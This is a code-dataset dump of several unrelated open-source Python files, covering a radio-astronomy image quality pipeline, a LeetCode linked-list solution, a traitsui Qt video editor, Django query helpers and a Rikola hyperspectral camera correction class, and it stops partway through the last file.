__name__=='__main__':\n # Main loop\n if len(sys.argv)<2:\n warn('quality_pipeline.py must be called with at least one parameter file\\nor a command-line option list.\\nE.g \"pipeline.py example.cfg second_example.cfg --solutions-robust=0.1\"\\nSee below for a complete list of possible options with their default values.')\n print_options(option_list)\n sys.exit(1)\n\n o=options(sys.argv[1:],option_list)\n if 
o['pbimage'] is None:\n die('pbimage must be specified')\n if o['nonpbimage'] is None:\n die('nonpbimage must be specified')\n if o['list'] is not None:\n # fix up the new list-type options\n for i,cat in enumerate(o['list']):\n try:\n o[cat]=o['filenames'][i]\n except:\n pass\n try:\n o[cat+'_matchrad']=o['radii'][i]\n except:\n pass\n try:\n o[cat+'_fluxfactor']=o['fluxfactor'][i]\n except:\n pass\n \n if \"DDF_PIPELINE_CATALOGS\" in list(os.environ.keys()):\n o['catdir']=os.environ[\"DDF_PIPELINE_CATALOGS\"]\n\n if o['logging'] is not None and not os.path.isdir(o['logging']):\n os.mkdir(o['logging'])\n \n # pybdsm source finding\n sfind_image(o['catprefix'],o['pbimage'],o['nonpbimage'],o['sfind_pixel_fraction'],options=o)\n\n # facet labels -- do this now for generality\n cra,cdec=get_centpos()\n t=Table.read(o['catprefix'] + '.cat.fits')\n tesselfile=o['catprefix']+'.tessel.reg'\n if 'Facet' not in t.columns:\n t=label_table(t,tesselfile,cra,cdec)\n t.write(o['catprefix'] + '.cat.fits',overwrite=True)\n\n catsources=len(t)\n \n # matching with catalogs\n removelist=[]\n for cat in o['list']:\n print('Doing catalogue',cat)\n if crossmatch_image(o['catprefix'] + '.cat.fits',cat,catdir=o['catdir'])>10:\n filter_catalog(o['catprefix'] + '.cat.fits',o['catprefix']+'.cat.fits_'+cat+'_match.fits',o['pbimage'],o['catprefix']+'.cat.fits_'+cat+'_match_filtered.fits',cat,options=o)\n else:\n print('Insufficient matches, abandoning catalogue')\n removelist.append(cat)\n for cat in removelist:\n o['list'].remove(cat)\n\n # Astrometric plots\n if 'FIRST' in o['list']:\n report('Plotting position offsets')\n plot_position_offset('%s.cat.fits_FIRST_match_filtered.fits'%o['catprefix'],o['pbimage'],'%s.cat.fits_FIRST_match_filtered_positions.png'%o['catprefix'],'FIRST',options=o)\n\n t=Table.read(o['catprefix']+'.cat.fits_FIRST_match_filtered.fits')\n bsra=np.percentile(bootstrap(t['FIRST_dRA'],np.mean,10000),(16,84))\n bsdec=np.percentile(bootstrap(t['FIRST_dDEC'],np.mean,10000),(16,84))\n mdra=np.mean(t['FIRST_dRA'])\n mddec=np.mean(t['FIRST_dDEC'])\n print('Mean delta RA is %.3f arcsec (1-sigma %.3f -- %.3f arcsec)' % (mdra,bsra[0],bsra[1]))\n print('Mean delta DEC is %.3f arcsec (1-sigma %.3f -- %.3f arcsec)' % (mddec,bsdec[0],bsdec[1]))\n first_ra=mdra\n first_dec=mddec\n \n report('Plotting per-facet position offsets')\n do_plot_facet_offsets(t,tesselfile,o['catprefix']+'.cat.fits_FIRST_match_filtered_offsets.png')\n t['FIRST_dRA']-=mdra\n t['FIRST_dDEC']-=mddec\n do_plot_facet_offsets(t,tesselfile,o['catprefix']+'.cat.fits_FIRST_match_filtered_offsets_registered.png')\n\n report('Plotting flux ratios')\n # Flux ratio plots (only compact sources)\n plot_flux_ratios('%s.cat.fits_FIRST_match_filtered.fits'%o['catprefix'],o['pbimage'],'%s.cat.fits_FIRST_match_filtered_fluxerrors.png'%o['catprefix'],options=o)\n else:\n first_ra=None\n first_dec=None\n \n report('Plotting flux scale comparison')\n # Flux scale comparison plots\n if 'TGSS' in o['list']:\n plot_flux_errors('%s.cat.fits_TGSS_match_filtered.fits'%o['catprefix'],o['pbimage'],'%s.cat.fits_TGSS_match_filtered_fluxratio.png'%o['catprefix'],'TGSS',options=o)\n t=Table.read(o['catprefix']+'.cat.fits_TGSS_match_filtered.fits')\n ratios=old_div(t['Total_flux'],(old_div(t['TGSS_Total_flux'],o['TGSS_fluxfactor'])))\n bsratio=np.percentile(bootstrap(ratios,np.median,10000),(16,84))\n print('Median LOFAR/TGSS ratio is %.3f (1-sigma %.3f -- %.3f)' % (np.median(ratios),bsratio[0],bsratio[1]))\n tgss_scale=np.median(ratios)\n else:\n tgss_scale=None\n 
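# Same flux-scale comparison against NVSS, limited to bright (>30 mJy) sources.\n    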
if 'NVSS' in o['list']:\n        t=Table.read(o['catprefix']+'.cat.fits_NVSS_match_filtered.fits')\n        t=t[t['Total_flux']>30e-3]\n        ratios=old_div(t['Total_flux'],t['NVSS_Total_flux'])\n        bsratio=np.percentile(bootstrap(ratios,np.median,10000),(16,84))\n        print('Median LOFAR/NVSS ratio is %.3f (1-sigma %.3f -- %.3f)' % (np.median(ratios),bsratio[0],bsratio[1]))\n        nvss_scale=np.median(ratios)\n    else:\n        nvss_scale=None\n    # Noise estimate\n    hdu=fits.open(o['pbimage'])\n    imagenoise = get_rms(hdu)\n    rms=imagenoise*1e6\n    print('An estimate of the image noise is %.3f muJy/beam' % rms)\n    drs=do_dr_checker(o['catprefix']+'.cat.fits',o['pbimage'],verbose=False,peak=0.4)\n    dr=np.median(drs)\n    print('Median dynamic range is',dr)\n\n    # fit source counts\n    if o['fit_sourcecounts']:\n        from fit_sourcecounts import do_fit_sourcecounts\n        sc_norm,sc_index,scale=do_fit_sourcecounts(rms=imagenoise)\n    else:\n        sc_norm=sc_index=scale=None\n    \n    print(rms,dr,catsources,first_ra,first_dec,tgss_scale,nvss_scale,sc_norm,sc_index,scale)\n\n    if use_database():\n        id=get_id()\n        with SurveysDB() as sdb:\n            result=sdb.create_quality(id)\n            result['rms']=float(rms)\n            result['dr']=float(dr)\n            result['catsources']=int(catsources)\n            if first_ra is not None:\n                result['first_ra']=float(first_ra)\n                result['first_dec']=float(first_dec)\n            if tgss_scale is not None:\n                result['tgss_scale']=float(tgss_scale)\n            if nvss_scale is not None:\n                result['nvss_scale']=float(nvss_scale)\n            if sc_norm is not None:\n                result['sc_norm']=float(sc_norm)\n                result['sc_index']=float(sc_index)\n                result['sc_scale']=float(scale)\n            \n            sdb.set_quality(result)\n","repo_name":"mhardcastle/ddf-pipeline","sub_path":"scripts/quality_pipeline.py","file_name":"quality_pipeline.py","file_ext":"py","file_size_in_byte":12366,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"6"} +{"seq_id":"32469686798","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nfrom collections import deque\n\nclass Solution:\n    def removeZeroSumSublists(self, head: ListNode) -> ListNode:\n        dummy = ListNode(0)\n        dummy.next = head\n        cur = dummy\n        sums = deque([0])\n        sum_last_nodes = {0: dummy}\n        \n        while cur.next:\n            next_sum = sums[-1] + cur.next.val\n            \n            if next_sum in sum_last_nodes:\n                while sums[-1] != next_sum:\n                    sum_last_nodes.pop(sums.pop())\n                sum_last_nodes[next_sum].next = cur.next.next\n                cur = sum_last_nodes[next_sum]\n            else:\n                sums.append(next_sum)\n                cur = cur.next\n                sum_last_nodes[next_sum] = cur\n        \n        return dummy.next\n","repo_name":"MdAbedin/leetcode","sub_path":"1101 - 1200/1171 Remove Zero Sum Consecutive Nodes from Linked List.py","file_name":"1171 Remove Zero Sum Consecutive Nodes from Linked List.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"30357883471","text":"from pyface.qt import is_qt5\nfrom pyface.qt.QtCore import QPoint, Qt, QUrl, Signal\nfrom pyface.qt.QtGui import QImage, QPainter, QPalette, QSizePolicy\nfrom pyface.qt.QtMultimedia import (\n    QAudio,\n    QMediaPlayer,\n    QVideoFrame,\n)\nfrom pyface.qt.QtMultimediaWidgets import QVideoWidget\nfrom traits.api import (\n    Any, Bool, Callable, Float, Instance, Range, Str, observe,\n)\nfrom traitsui.editors.video_editor import AspectRatio, MediaStatus, PlayerState\n\nfrom .editor import Editor\n\n#: Map from AspectRatio enum values to Qt aspect ratio behaviours.\naspect_ratio_map = {\n    'ignore': Qt.AspectRatioMode.IgnoreAspectRatio,\n    'keep': 
Qt.AspectRatioMode.KeepAspectRatio,\n    'expand': Qt.AspectRatioMode.KeepAspectRatioByExpanding,\n}\n\n#: Map from PlayerState enum values to QMediaPlayer states.\nif is_qt5:\n    state_map = {\n        'stopped': QMediaPlayer.State.StoppedState,\n        'playing': QMediaPlayer.State.PlayingState,\n        'paused': QMediaPlayer.State.PausedState,\n    }\nelse:\n    state_map = {\n        'stopped': QMediaPlayer.PlaybackState.StoppedState,\n        'playing': QMediaPlayer.PlaybackState.PlayingState,\n        'paused': QMediaPlayer.PlaybackState.PausedState,\n    }\n\n#: Map from QMediaPlayer states to PlayerState enum values.\nreversed_state_map = {value: key for key, value in state_map.items()}\n\n#: Map from QMediaPlayer media status values to MediaStatus enum values.\nmedia_status_map = {\n    QMediaPlayer.MediaStatus.NoMedia: 'no_media',\n    QMediaPlayer.MediaStatus.LoadingMedia: 'loading',\n    QMediaPlayer.MediaStatus.LoadedMedia: 'loaded',\n    QMediaPlayer.MediaStatus.StalledMedia: 'stalled',\n    QMediaPlayer.MediaStatus.BufferingMedia: 'buffering',\n    QMediaPlayer.MediaStatus.BufferedMedia: 'buffered',\n    QMediaPlayer.MediaStatus.EndOfMedia: 'end',\n    QMediaPlayer.MediaStatus.InvalidMedia: 'invalid',\n}\nif is_qt5:\n    media_status_map[QMediaPlayer.MediaStatus.UnknownMediaStatus] = 'unknown'\n\n\nif is_qt5:\n    # These classes support dynamically modifying the video stream frames but\n    # only work on Qt5\n    from pyface.qt.QtMultimedia import QAbstractVideoSurface\n\n    class ImageWidget(QVideoWidget):\n        \"\"\"Paints a QImage to the window body.\"\"\"\n\n        def __init__(self, parent=None, image_func=None):\n            import numpy as np\n\n            super().__init__(parent)\n            self.image = QImage()\n            self._np_image = np.zeros(shape=(0, 0, 4))\n            self.painter = None\n            self.resizeEvent(None)\n            if image_func is None:\n                # Don't bother with creating an ndarray version; the lambda\n                # must return a (QImage, ndarray) tuple, so parenthesise it\n                self.image_func = lambda image, bbox: (image, self._np_image)\n            else:\n                self.image_func = image_func\n\n        def resizeEvent(self, event):\n            s = self.size()\n            self.width = s.width()\n            self.height = s.height()\n\n        def setImage(self, image):\n            self.image, self._np_image = self.image_func(\n                image, (self.width, self.height)\n            )\n            self.update()\n\n        def paintEvent(self, event):\n            super().paintEvent(event)\n            if self.painter is None:\n                self.painter = QPainter()\n            self.painter.begin(self)\n            if self.image:\n                self.painter.drawImage(QPoint(0, 0), self.image)\n            self.painter.end()\n\n    class VideoSurface(QAbstractVideoSurface):\n\n        frameAvailable = Signal(['QImage'])\n\n        def __init__(self, widget=None):\n            super().__init__()\n            self.widget = widget\n\n        def supportedPixelFormats(self, handleType):\n            return [QVideoFrame.Format_RGB32]\n\n        def present(self, frame):\n            from pyface.qt.QtMultimedia import QAbstractVideoBuffer\n\n            cloned_frame = QVideoFrame(frame)\n            cloned_frame.map(QAbstractVideoBuffer.ReadOnly)\n            image = QImage(\n                cloned_frame.bits(),\n                cloned_frame.width(),\n                cloned_frame.height(),\n                cloned_frame.bytesPerLine(),\n                QVideoFrame.imageFormatFromPixelFormat(\n                    cloned_frame.pixelFormat()\n                ),\n            )\n            self.frameAvailable.emit(image)\n            return True\n\n\nclass VideoEditor(Editor):\n    \"\"\"Traits UI 'display only' video editor.\n\n    This editor uses the Qt QMultimedia machinery to display video streams\n    to the screen. 
Rather than being self-contained, the editor only concerns\n itself with displaying the video, and provides traits that control\n behaviour and provide internal state of the control during playback.\n \"\"\"\n\n #: Does the drawing onto the image plane\n control = Instance(QVideoWidget)\n\n #: Handles the image pulling so the frames can be processed. Qt5 only.\n surface = Any()\n\n #: The QMediaObject (Qt5) or QUrl (Qt6+) that holds the connection to the\n #: video stream.\n media_content = Any()\n\n #: The QMediaPlayer that controls playback of the video stream.\n media_player = Instance(QMediaPlayer)\n\n #: The aspect ratio of the video editor.\n aspect_ratio = AspectRatio()\n\n #: The current state of the player, synchronized to the trait named\n #: by factory.state.\n state = PlayerState()\n\n #: The current playback position of the player, synchronized to the trait\n #: named by factory.position.\n position = Float()\n\n #: The total duration of the current video, synchronized to the trait\n #: named by factory.duration.\n duration = Float()\n\n #: The media player playback status (loading, buffering, etc.),\n #: synchronized to the trait named by factory.media_status.\n media_status = MediaStatus()\n\n #: The percentage of the buffer currently filled, synchronized to the trait\n #: named by factory.buffer.\n buffer = Range(0, 100)\n\n #: A string holding the video error state, or \"\" if no error. Synchronized\n #: to the trait named by factory.video_error.\n video_error = Str()\n\n #: Whether the audio is muted or not, synchronized to the trait named by\n #: factory.muted.\n muted = Bool(False)\n\n #: The playback volume on a logarithmic scale (perceptually linear),\n #: synchronized to the trait named by factory.volume.\n volume = Range(0.0, 100.0)\n\n #: The playback rate. Negative values rewind the video.\n #: Synchronized to the trait named by factory.playback_rate.\n playback_rate = Float(1.0)\n\n #: Function to apply to the image. 
Takes ref to new frame and a size tuple.\n #: Synchronized to the trait named by factory.image_func.\n image_func = Callable()\n\n #: The change in position required for an update to be emitted.\n #: Synchronized to the trait named by factory.notify_interval.\n #: This is only used on Qt5.\n notify_interval = Float(1.0)\n\n #: Qt6-specific QAudioOutput handler.\n _audio = Any()\n\n def update_to_regular(self):\n if self.surface is not None:\n self.surface.frameAvailable.disconnect(self.control.setImage)\n self.surface = None\n\n self.control = QVideoWidget()\n self.control.setSizePolicy(\n QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Expanding\n )\n self.control.setBackgroundRole(QPalette.ColorRole.Window)\n self.media_player.setVideoOutput(self.control)\n\n def update_to_functional(self):\n self.control = ImageWidget(image_func=self.image_func)\n self.control.setSizePolicy(\n QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Expanding\n )\n self.control.setBackgroundRole(QPalette.ColorRole.Window)\n\n self.surface = VideoSurface(widget=self.control)\n self.surface.frameAvailable.connect(self.control.setImage)\n\n self.media_player.setVideoOutput(self.surface)\n\n # ------------------------------------------------------------------------\n # Editor interface\n # ------------------------------------------------------------------------\n\n def init(self, parent):\n \"\"\"Initialize the editor by creating the underlying toolkit widget.\n\n Parameters\n ----------\n parent : QWidget or None\n The parent widget for this widget.\n \"\"\"\n self.control = QVideoWidget()\n self.control.setSizePolicy(\n QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Expanding\n )\n self.control.setBackgroundRole(QPalette.ColorRole.Window)\n\n if is_qt5:\n self.media_player = QMediaPlayer(None, QMediaPlayer.VideoSurface)\n else:\n self.media_player = QMediaPlayer()\n self._set_video_url()\n self.media_player.setVideoOutput(self.control)\n if is_qt5:\n self.media_player.setMuted(self.muted)\n else:\n from pyface.qt.QtMultimedia import QAudioOutput\n\n self._audio = QAudioOutput()\n self._audio.setMuted(self.muted)\n self.media_player.setAudioOutput(self._audio)\n self._update_state()\n self._update_aspect_ratio()\n self._update_muted()\n self._update_volume()\n self._update_playback_rate()\n self._update_notify_interval()\n\n self._connect_signals()\n\n self.set_tooltip()\n\n def dispose(self):\n self._disconnect_signals()\n if self.media_player is not None:\n if not is_qt5:\n self.media_player.setSource(\"\")\n # Avoid a segfault if the media player is currently playing\n self.media_player.setVideoOutput(None)\n if not is_qt5:\n self.media_player.setAudioOutput(None)\n\n super().dispose()\n\n def update_editor(self):\n \"\"\"Update the editor when the object trait changes externally.\"\"\"\n self._set_video_url()\n\n # ------------------------------------------------------------------------\n # Private interface\n # ------------------------------------------------------------------------\n\n def _connect_signals(self):\n if self.media_player is not None:\n if is_qt5:\n self.media_player.stateChanged.connect(\n self._state_changed_emitted\n )\n self.media_player.error.connect(self._error_emitted)\n self.media_player.bufferStatusChanged.connect(\n self._buffer_status_changed_emitted\n )\n self.media_player.notifyIntervalChanged.connect(\n self._notify_interval_changed_emitted\n )\n else:\n self.media_player.playbackStateChanged.connect(\n self._state_changed_emitted\n )\n 
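# Editor's note: Qt6 renamed these QMediaPlayer signals -- errorOccurred\n                # replaces error, bufferProgressChanged replaces bufferStatusChanged,\n                # and playbackStateChanged replaces stateChanged; Qt6 has no\n                # notifyIntervalChanged counterpart, so none is connected here.\n                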
self.media_player.errorOccurred.connect(self._error_emitted)\n self.media_player.bufferProgressChanged.connect(\n self._buffer_status_changed_emitted\n )\n self.media_player.positionChanged.connect(\n self._position_changed_emitted\n )\n self.media_player.durationChanged.connect(\n self._duration_changed_emitted\n )\n self.media_player.mediaStatusChanged.connect(\n self._media_status_changed_emitted\n )\n\n def _disconnect_signals(self):\n if self.media_player is not None:\n if is_qt5:\n self.media_player.stateChanged.disconnect(\n self._state_changed_emitted\n )\n self.media_player.error.disconnect(self._error_emitted)\n self.media_player.bufferStatusChanged.disconnect(\n self._buffer_status_changed_emitted\n )\n self.media_player.notifyIntervalChanged.disconnect(\n self._notify_interval_changed_emitted\n )\n else:\n self.media_player.playbackStateChanged.disconnect(\n self._state_changed_emitted\n )\n self.media_player.errorOccurred.disconnect(self._error_emitted)\n self.media_player.bufferProgressChanged.disconnect(\n self._buffer_status_changed_emitted\n )\n self.media_player.positionChanged.disconnect(\n self._position_changed_emitted\n )\n self.media_player.durationChanged.disconnect(\n self._duration_changed_emitted\n )\n self.media_player.mediaStatusChanged.disconnect(\n self._media_status_changed_emitted\n )\n\n def _set_video_url(self):\n qurl = QUrl.fromUserInput(self.value)\n if is_qt5:\n from pyface.qt.QtMultimedia import QMediaContent\n if qurl.isValid():\n self.media_content = QMediaContent(qurl)\n else:\n self.media_content = QMediaContent(None)\n else:\n self.media_content = qurl\n self.control.updateGeometry()\n\n # Signal handlers -------------------------------------------------------\n\n def _state_changed_emitted(self, state):\n self.state = reversed_state_map[state]\n\n def _position_changed_emitted(self, position):\n # Avoid telling Qt about the new position in `_position_changed`\n with self.updating_value():\n self.position = position / 1000.0\n\n def _duration_changed_emitted(self, duration):\n self.duration = duration / 1000.0\n\n def _error_emitted(self, error):\n if error != QMediaPlayer.Error.NoError:\n self.video_error = self.media_player.errorString()\n else:\n self.video_error = ''\n\n def _media_status_changed_emitted(self, error):\n self.media_status = media_status_map[self.media_player.mediaStatus()]\n\n def _buffer_status_changed_emitted(self, error):\n if is_qt5:\n self.buffer = self.media_player.bufferStatus()\n else:\n self.buffer = int(self.media_player.bufferProgress() * 100)\n\n def _notify_interval_changed_emitted(self, interval):\n self.notify_interval = interval / 1000.0\n\n # Trait change handlers -------------------------------------------------\n\n @observe('aspect_ratio')\n def _aspect_ratio_observer(self, event):\n if self.control is not None:\n self._update_aspect_ratio()\n\n @observe('image_func')\n def _image_func_observer(self, event):\n if self.image_func is None:\n self.update_to_regular()\n elif not is_qt5:\n raise ValueError(\"image_func is not supported on Qt6\")\n else:\n self.update_to_functional()\n\n @observe('media_content')\n def _media_content_observer(self, event):\n self.video_error = ''\n if self.media_player is not None:\n if is_qt5:\n self.media_player.setMedia(self.media_content)\n else:\n self.media_player.setSource(self.media_content)\n\n @observe('muted')\n def _muted_observer(self, event):\n if self.media_player is not None:\n self._update_muted()\n\n @observe('playback_rate')\n def _playback_rate_observer(self, 
event):\n if self.media_player is not None:\n self._update_playback_rate()\n\n @observe('position')\n def _position_observer(self, event):\n if self.media_player is not None and not self.updating:\n # position is given in ms\n self.media_player.setPosition(int(self.position * 1000))\n\n @observe('state')\n def _state_observer(self, event):\n if self.media_player is not None:\n self._update_state()\n\n @observe('volume')\n def _volume_observer(self, event):\n if self.media_player is not None:\n self._update_volume()\n\n @observe('notify_interval')\n def _notify_interval_observer(self, event):\n if self.media_player is not None:\n self._update_notify_interval()\n\n # MediaPlayer management ------------------------------------------------\n\n def _update_aspect_ratio(self):\n self.control.setAspectRatioMode(aspect_ratio_map[self.aspect_ratio])\n\n def _update_muted(self):\n if is_qt5:\n self.media_player.setMuted(self.muted)\n else:\n self._audio.setMuted(self.muted)\n\n def _update_playback_rate(self):\n self.media_player.setPlaybackRate(self.playback_rate)\n\n def _update_state(self):\n if self.state == 'stopped':\n self.media_player.stop()\n self.control.repaint()\n elif self.state == 'playing':\n # XXX forcing a resize so video is scaled correctly on MacOS\n s = self.control.size()\n w = s.width()\n h = s.height()\n self.media_player.play()\n self.control.resize(w + 1, h + 1)\n self.control.resize(w, h)\n elif self.state == 'paused':\n self.media_player.pause()\n\n def _update_volume(self):\n linear_volume = QAudio.convertVolume(\n self.volume / 100.0,\n QAudio.VolumeScale.LogarithmicVolumeScale,\n QAudio.VolumeScale.LinearVolumeScale,\n )\n if is_qt5:\n self.media_player.setVolume(int(linear_volume * 100))\n else:\n self._audio.setVolume(linear_volume)\n\n def _update_notify_interval(self):\n # only used on Qt5\n if is_qt5:\n # interval is given in ms\n interval = int(self.notify_interval * 1000)\n self.media_player.setNotifyInterval(interval)\n","repo_name":"enthought/traitsui","sub_path":"traitsui/qt/video_editor.py","file_name":"video_editor.py","file_ext":"py","file_size_in_byte":17502,"program_lang":"python","lang":"en","doc_type":"code","stars":290,"dataset":"github-code","pt":"6"} +{"seq_id":"16639112119","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\n__author__ = 'qing.li'\n\"\"\"\nfrom django.http import QueryDict\nfrom django.db.models import Q\n\n\ndef get_url(request):\n url = request.get_full_path()\n qd = QueryDict()\n qd._mutable = True\n qd['next_page'] = url\n # query_params = qd.urlencode()\n\n return qd\n\n\ndef get_query_condition(request, query_list):\n query = request.GET.get(\"query\", '')\n q = Q()\n q.connector = 'OR'\n for i in query_list:\n q.children.append(Q(('{}__icontains'.format(i), query)))\n\n return q","repo_name":"QingqinLi/nb_crm","sub_path":"utils/get_utils.py","file_name":"get_utils.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35253758855","text":"import os\nimport hylite.io as io\nfrom .sensor import Sensor\nimport numpy as np\nfrom pathlib import Path\nimport cv2\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\nimport piexif\nimport matplotlib.pyplot as plt\n\nclass Rikola(Sensor):\n \"\"\"\n Implementation of sensor corrections for the Rikola sensor.\n \"\"\"\n\n # constants used for boundary tracking when correcting for sensor shift (spatial)\n LEFT_BOUND = 99999\n RIGHT_BOUND = 99998\n TOP_BOUND = 99997\n 
BOTTOM_BOUND = 99996\n\n    @classmethod\n    def correct_image(cls, image, verbose=True, **kwds):\n        \"\"\"\n        Apply sensor corrections to an image.\n\n        Args:\n            image (hylite.HyImage): a hyImage instance of an image captured using this sensor.\n            verbose (bool): true if updates/progress should be printed to the console. Default is True.\n            **kwds: Optional keywords include:\n\n                 - crop = True if the image should be cropped so that only pixels covered by all bands after alignment are retained. Default is True.\n                 - align = True if the image bands should be coaligned using sift (due to delayed acquisition times). Default is True.\n                 - lens = True if the RIKOLA lens correction should be applied to correct for lens distortion. Default is True.\n                 - match_band = the band to co-register data to. This should be a good quality band (low noise etc.). Default is 30.\n                 - contrast_thresh = the contrast threshold used for SIFT matching. Default is 0.01.\n                 - sigma = the sigma to use for SIFT matching. Default is 1.5.\n                 - edge_thresh = the edge threshold to use for sift matching. Default is 10.\n                 - eq = equalise before sift? 'True' or 'False'. Default is 'False'.\n                 - match_dist = maximum matching distance for SIFT. Default is 0.7.\n                 - min_match = the minimum number of matches to apply band coregistration. Default is 5.\n                 - warp = the warping method used to align bands. Can be 'affine', 'homography' or 'flow'.\n                        Default is 'flow', which aligns each band using 'affine' and then refines the result using dense optical flow.\n                        This is slow but corrects for errors associated with perspective and non-flat topography...\n\n        \"\"\"\n\n        #get keywords\n        contrast_thresh = kwds.get(\"contrast_thresh\", 0.01)\n        sigma = kwds.get(\"sigma\", 1.5)\n        edge_thresh = kwds.get(\"edge_thresh\", 10)\n        eq = kwds.get(\"eq\", False)\n        match_dist = kwds.get(\"match_dist\", 0.7)\n        min_match = kwds.get(\"min_match\", 5)\n        warp = kwds.get(\"warp\", 'flow')\n        match_band = kwds.get(\"match_band\", 30)\n        crop = kwds.get('crop', True)\n        align = kwds.get('align', True)\n        lens = kwds.get('lens', True)\n\n        # n.b. rikola camera already applies dark correction. Hence, we only need to apply a lens correction and align the bands\n\n        ###############################\n        # LENS CORRECTION\n        ###############################\n\n        #Lens correction for NEW rikola camera\n        if image.samples() == 1024: #new rikola\n\n            #delete dodgy bands at start and end of spectral range\n            image.band_names = image.header.get_wavelengths() #np.fromstring( image.header['wavelength'], sep=\",\" ) #load band wavelengths\n            lower = np.argmin( image.band_names < 512 ) #first valid band\n            upper = np.argmin( image.band_names < 914 ) #last valid band\n            image.data = image.data[:,:,lower:upper] #delete dodgy bands\n            image.band_names = image.band_names[lower:upper]\n\n            if lens:\n                #lens correction for sensor 1\n                RIKMat = np.array(\n                    [[1559.169765826131 - 2.1075939987083148, -0.46558291934094703, 512. - 12.049303428088125],\n                     [0, 1559.169765826131, 512. + 10.043851873473248], [0, 0, 1]])\n                RIKdist = np.array([[-0.22431431139011579, -0.25788278936781356, -0.00070123282637077225,\n                                     0.0023607284552227088, 1.3341497419995652]])\n                m, roi = cv2.getOptimalNewCameraMatrix(RIKMat, RIKdist, (image.lines(), image.samples()), 1,\n                                                       (image.lines(), image.samples()))\n\n\n                #lens correction for sensor 2\n                RIKMat2 = np.array(\n                    [[1562.7573572611377 - 3.2133196257811703, 1.6878264077638325, 512. - 14.06301214860064],\n                     [0, 1562.7573572611377, 512. 
+ 11.549906117342049], [0, 0, 1]])\n                RIKdist2 = np.array([[-0.23799506683807267, -0.079495552793610855, 0.00085334990816270302,\n                                      0.0017596141854012402, 0.78590417508343857]])\n                m2, roi2 = cv2.getOptimalNewCameraMatrix(RIKMat2, RIKdist2, (image.lines(), image.samples()), 1,\n                                                         (image.lines(), image.samples()))\n\n                #find sensor gap where we change corrections (648 nm band)\n                sensgap = np.argmin(image.get_wavelengths() < 648)\n\n                # transpose into img[y][x][b]\n                image.data = np.transpose(image.data, (1, 0, 2))\n\n                # apply lens correction\n                if verbose: print(\"Applying lens correction... \", end=\"\", flush=\"True\")\n                image.data[:,:,0:sensgap] = cv2.undistort(image.data[:,:,0:sensgap], RIKMat, RIKdist, None, m)\n                image.data[:,:,sensgap:] = cv2.undistort(image.data[:, :, sensgap::], RIKMat2, RIKdist2, None, m2)\n\n                # crop\n                x, y, w, h = roi2\n                image.data = image.data[x:(x + w - 10), y:(y + h - 10)]\n\n                if verbose: print(\"DONE.\", flush=\"True\")\n\n                # transpose back to img[x][y][b]\n                image.data = np.transpose(image.data, (1, 0, 2))\n\n\n        #lens correction for OLD rikola camera\n        elif lens:\n            # define camera correction parameters\n            # camera matrix = ([[fx,skew,cx],[0,fy,cy],[0,0,1]])\n            # distortion coefficients = ([[k1,k2,kp1,p2,k3]])\n            # n.b. depending on the acquisition mode the rikola reads either the whole sensor (1010 lines) or half the sensor (648 lines). Hence we choose the camera matrix accordingly\n            if image.lines() == 1010: #old rikola, full frame\n                RIKMat = np.array([[1580, -0.37740987561726941, 532.14269389794072],\n                                   [0, 1586.5023476977308, 552.87899983359080],\n                                   [0, 0, 1]])\n\n                RIKdist = np.array([[-0.34016504377397944, 0.15595251253428483, 0.00032919179911211665,\n                                     0.00016579344155373088, 0.051315602289989909]])\n\n            elif image.lines() == 648: #old rikola, half frame\n                RIKMat = np.array([[1580.9821817891338, -0.053468464819987738, 537.09531859948970],\n                                   [0, 1580.4094746112266, 369.76442407125506],\n                                   [0, 0, 1]])\n                RIKdist = np.array([[-0.31408677145500508, -0.26653256083139154, 0.00028155583639827883,\n                                     0.00025705469073531660, 2.4100464839836362]])\n            else:\n                assert False, \"Error - invalid number of lines (%d) for RIKOLA image. Should be either 1010 or 648\" % (\n                    image.lines())\n\n            # create calibration map\n            m, roi = cv2.getOptimalNewCameraMatrix(RIKMat, RIKdist, (image.lines(), image.samples()), 1,\n                                                   (image.lines(), image.samples()))\n\n            # transpose into img[y][x][b]\n            image.data = np.transpose(image.data, (1, 0, 2))\n\n            # loop through bands and apply correction\n            if verbose: print(\"Applying lens correction... \", end=\"\", flush=\"True\")\n\n            # apply lens correction\n            image.data = cv2.undistort(image.data, RIKMat, RIKdist, None, m)\n\n            # crop\n            x, y, w, h = roi\n            image.data = image.data[x:(x + w - 10), y:(y + h - 10)]\n\n            if verbose: print(\"DONE.\", flush=\"True\")\n\n            # transpose back to img[x][y][b]\n            image.data = np.transpose(image.data, (1, 0, 2))\n\n        ###############################\n        # COREGISTER BANDS\n        ###############################\n\n        # flag boundary pixels in each band so we can crop it after warping\n        image.edge_mask = np.zeros(image.data[:, :, 0:4].shape, dtype=np.float32)\n        image.edge_mask[0:3, :, 0] = 1.0\n        image.edge_mask[-4:-1, :, 1] = 1.0\n        image.edge_mask[:, 0:3, 2] = 1.0\n        image.edge_mask[:, -4:-1, 3] = 1.0\n        edge_accum = np.zeros_like(image.edge_mask)\n        if align:\n            # identify SIFT features for each band\n            if verbose: print(\"Identifying SIFT features... 
